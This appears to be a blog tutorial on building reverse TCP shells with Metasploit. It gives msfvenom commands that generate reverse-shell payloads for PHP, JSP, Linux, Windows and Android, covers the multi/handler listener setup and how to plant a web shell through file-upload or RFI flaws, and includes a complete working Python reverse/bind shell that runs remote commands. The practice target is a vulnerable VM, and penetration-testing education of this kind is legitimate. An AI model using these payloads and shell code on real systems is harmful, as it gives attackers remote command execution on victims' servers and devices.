Reverse TCP shell with Metasploit

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Mar 23, 2020

Metasploit is an awesome tool. It can automate the exploitation process, generate shellcode, act as a listener and more. I hope to start a tutorial series on the Metasploit Framework and its companion programs. So in today's tutorial we are going to see how to build a reverse TCP shell with Metasploit. As an example we use msfvenom to create a PHP web shell and Metasploit's handler to catch the session. When executed, the shell opens a reverse TCP connection back to our machine.

Reverse TCP vs Bind TCP shell

First of all, let's clear up what a reverse TCP shell and a bind shell are and how they work. In both cases there is an attacker machine and a victim server. In a reverse shell the connection is opened from the victim server to the attacker's machine: we set up a listener on the attacker's machine, it waits for an incoming connection from the victim, and when the TCP connection arrives it serves us a shell on the victim server. Because the victim initiates an outbound connection, a reverse shell usually gets through firewalls and NAT that would block an inbound connection to the victim.

A bind shell works the other way around. The payload binds a shell to a specific port on the victim server and listens there, so the attacker uses their own machine to connect to the victim. This only works when the attacker can reach that port on the victim, which is why reverse shells are more common in practice.
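The two connection directions described above, as an added example that is not part of the original post and is not Metasploit's own payload code: a minimal Python command shell that runs either as a reverse shell (the victim connects out to the attacker's listener) or as a bind shell (the victim listens and the attacker connects in). Both sides run on loopback with ephemeral ports so it executes offline; the "<END>" framing marker and the echo commands are constructed for the demo.

```python
# Added example: minimal reverse shell vs bind shell on loopback (not Metasploit code).
# Both modes share the same command loop; only WHO opens the TCP connection differs.
import socket
import subprocess
import threading

END = b"<END>\n"  # assumed framing marker so the attacker knows when output is complete


def serve_commands(conn: socket.socket) -> None:
    """Victim side: read newline-terminated commands, run them, send output back.
    The session ends on 'exit' or when the peer closes the connection.
    Everything travels in cleartext, exactly like a plain TCP shell payload."""
    with conn:
        buf = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                return
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode(errors="replace").strip()
                if cmd == "exit":
                    return
                result = subprocess.run(cmd, shell=True, capture_output=True)
                conn.sendall(result.stdout + result.stderr + END)


def reverse_shell(lhost: str, lport: int) -> None:
    """Reverse shell, victim side: the VICTIM opens an outbound TCP connection
    to the attacker's LHOST:LPORT (the direction php/meterpreter_reverse_tcp uses)."""
    serve_commands(socket.create_connection((lhost, lport)))


def start_bind_shell(host: str = "127.0.0.1", port: int = 0) -> int:
    """Bind shell, victim side: the VICTIM listens on a port and waits for the
    attacker to connect in. Returns the bound port (port 0 = pick a free one)."""
    srv = socket.socket()
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def accept_one() -> None:
        conn, _ = srv.accept()
        srv.close()
        serve_commands(conn)

    threading.Thread(target=accept_one, daemon=True).start()
    return bound_port


def run_remote(conn: socket.socket, cmd: str) -> str:
    """Attacker side: send one command and read the reply up to the framing marker."""
    conn.sendall(cmd.encode() + b"\n")
    data = b""
    while not data.endswith(END):
        chunk = conn.recv(4096)
        if not chunk:
            break
        data += chunk
    if data.endswith(END):
        data = data[: -len(END)]
    return data.decode(errors="replace")


def demo_reverse(cmd: str = "echo reverse-ok") -> str:
    """Attacker starts a listener (the role of exploit/multi/handler); victim calls back."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    listener.settimeout(5)
    lport = listener.getsockname()[1]
    threading.Thread(target=reverse_shell, args=("127.0.0.1", lport), daemon=True).start()
    conn, _ = listener.accept()  # the connection arrives FROM the victim
    listener.close()
    with conn:
        out = run_remote(conn, cmd)
        conn.sendall(b"exit\n")
    return out.strip()


def demo_bind(cmd: str = "echo bind-ok") -> str:
    """Victim listens first; the attacker connects TO it."""
    port = start_bind_shell()
    with socket.create_connection(("127.0.0.1", port)) as conn:  # attacker dials in
        out = run_remote(conn, cmd)
        conn.sendall(b"exit\n")
    return out.strip()


if __name__ == "__main__":
    print("reverse:", demo_reverse())
    print("bind:   ", demo_bind())
```

Note the asymmetry in demo_reverse: the attacker only ever calls accept(), never connect(), which is why a reverse shell needs nothing more than an open listening port on the attacker side and works from behind the victim's firewall.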

Generating the exploit using Msfvenom

First we use msfvenom to create our shell. This tool ships with the Metasploit Framework and generates payloads (not exploits: the exploit is the bug that lets us run the payload) for multiple platforms such as Android, Windows, PHP servers, etc.

Following is the syntax for generating a payload with msfvenom.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST=<attacker IP> LPORT=555

Here we have supplied several arguments to msfvenom. Let's see what they do. We are not using an encoder (-e) at the moment; encoders are a topic for a later tutorial.

-p stands for payload and tells msfvenom which payload to use; here it is Meterpreter. You can list the available payloads with the command msfvenom --list payloads. In the example above we chose a PHP payload because we are building a web shell.

-o is the output file; we specified shell.php, so the payload is written to shell.php. Note that -o only names the file, it does not choose the format. For text payloads such as PHP and JSP the default raw output is already the script itself, but for Linux and Windows binaries you must also pass -f elf or -f exe, otherwise you get raw shellcode bytes rather than an executable.

The following list shows some payload types we use often.

Web servers

Most web servers run PHP as their server-side language. We can build a PHP web shell with msfvenom by using php/meterpreter_reverse_tcp as the payload. Since we are uploading it to a PHP server, the extension of the shell should be .php.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST=<attacker IP> LPORT=555

What about a JSP server? We can build the web shell as a .jsp file and try to upload it. For that we use java/jsp_shell_reverse_tcp as the payload and .jsp as the output file type. Note that this one is a plain command shell rather than Meterpreter, so the handler must later be set to the same payload name.

msfvenom -p java/jsp_shell_reverse_tcp -o shell.jsp LHOST=<attacker IP> LPORT=555

Linux platforms

If we want to attack a Linux server we can use linux/x86/meterpreter/reverse_tcp as the payload (linux/x64/meterpreter/reverse_tcp for a 64-bit target) and write an ELF executable with -f elf, saved with the .elf extension.

msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=<attacker IP> LPORT=555

Windows machines

For Windows we can use Meterpreter as the payload, so we select windows/meterpreter/reverse_tcp (windows/x64/meterpreter/reverse_tcp for a 64-bit target) and write a PE executable with -f exe. As you know, the extension should be .exe.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -o shell.exe LHOST=<attacker IP> LPORT=555

Android devices

Android is the world's most popular mobile operating system, and Metasploit has various payloads for it. Commonly we use android/meterpreter_reverse_tcp to attack Android devices. The output file type should be .apk; for Android payloads msfvenom's default output is already an APK, so no -f option is needed.

msfvenom -p android/meterpreter_reverse_tcp -o shell.apk LHOST=<attacker IP> LPORT=555

LHOST is the IP address of the attacker machine as seen from the victim, because a reverse shell is connected from the victim machine to our machine. On the same LAN that is our local IP; across the Internet it is our public IP, with the port forwarded to our machine. Replace the <attacker IP> placeholder in the commands above with that address.

LPORT is a free port on our machine that the victim can reach (not blocked by a firewall or NAT). The handler we start later must listen on the same port.

Now that we have generated our shell as a PHP file, we can use any method, such as an RFI or a file upload vulnerability, to get it onto the server. I'll use the Web for Pentester vulnerable VM. Before we execute the shell we need to set up a listener to catch the connection.

Now we start the Metasploit Framework. There are several ways to use Metasploit, such as msfconsole and Armitage (older interfaces like msfcli and msfweb have since been removed from the framework). Most of the time we use msfconsole.

Yes, a beautiful interface. It is an interactive shell and easy to use. First we need a handler for our connection; the handler is responsible for accepting the reverse connection and turning it into a session. Here we use multi/handler, selected with the use exploit/multi/handler command.

Now we have to set some extra options. At any time in msfconsole you can see which options need to be set by entering the command show options.

The options show that we need to set LHOST and LPORT; both must be the same values we used when generating the shell (set LHOST <attacker IP> and set LPORT 555). We also have to set the payload to the one we generated (set payload php/meterpreter_reverse_tcp); if the handler is left on its default payload it will not speak Meterpreter's protocol and we will not get a working session.

OK, now it is time to attack. We use the run command to start the handler.

The handler is now waiting for an incoming connection. Now we execute our shell on the web server; for the PHP shell that means requesting shell.php in a browser or with curl.

Yes, it worked: we got our Meterpreter shell. Now we can do many things. I'll post another tutorial on Meterpreter; until then you can see what is available with the help command. :-)

Hi, I'm Thilan. An engineering student from Sri Lanka. I love to code with Python, JavaScript, PHP and C.
